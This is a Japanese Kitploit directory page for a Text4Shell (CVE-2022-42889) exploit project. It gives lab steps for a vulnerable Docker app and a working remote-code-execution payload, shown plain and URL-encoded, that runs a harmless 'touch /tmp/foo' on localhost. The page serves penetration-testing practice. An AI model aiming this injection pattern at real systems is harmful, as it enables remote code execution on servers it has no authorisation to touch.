Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Text4shell--Automated-exploit---CVE-2022-42889 — CVE-2022-42889(Text4Shell)用の自動エクスプロイト。テストと手動エクスプロイトガイダンス用の脆弱なDocker化アプリを備えています。 | Kitploit
ツール/GitHubGitHub/adarshpv9746/text4shell--automated-exploit---cve-2022-42889
動的分析 (サンドボックス)脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubadarshpv9746/text4shell--automated-exploit---cve-2022-42889

Text4shell--Automated-exploit---CVE-2022-42889

CVE-2022-42889(Text4Shell)用の自動エクスプロイト。テストと手動エクスプロイトガイダンス用の脆弱なDocker化アプリを備えています。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
53年前未レビュー

Mavenのインストール - maven-linux


//自動ハッキング用: 1../install.sh

root@kitploit:~
2../exploit.sh

3.アプリケーションを削除するには ./stopapp.sh を使用します

//手動ハッキング用:

  1. ファットJARを作成するためのMavenのインストール
root@kitploit:~
mvn clean install
  1. Dockerビルド
root@kitploit:~
docker build --tag=text4shell .
  1. Docker実行
root@kitploit:~
docker run -p 80:8080 text4shell
  1. アプリをテストする
root@kitploit:~
http://localhost/text4shell/attack?search=<anything>
  1. 攻撃は、前述のルックアップをプレフィックスとする文字列“${prefix:name}”を渡すことで実行できます:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

  1. dns または url プレフィックスも試すことができます。

  2. コンテナIDを取得する

root@kitploit:~
docker container ls
  1. アプリの中に入る
root@kitploit:~
docker exec -it <container_id> bash
  1. 上記のRCEが成功したかどうかを確認するには (/tmpディレクトリにfooという名前のファイルが作成されているはずです):
root@kitploit:~
ls /tmp/
  1. コンテナを停止する
root@kitploit:~
docker container stop <container_id>
ツールをダウンロード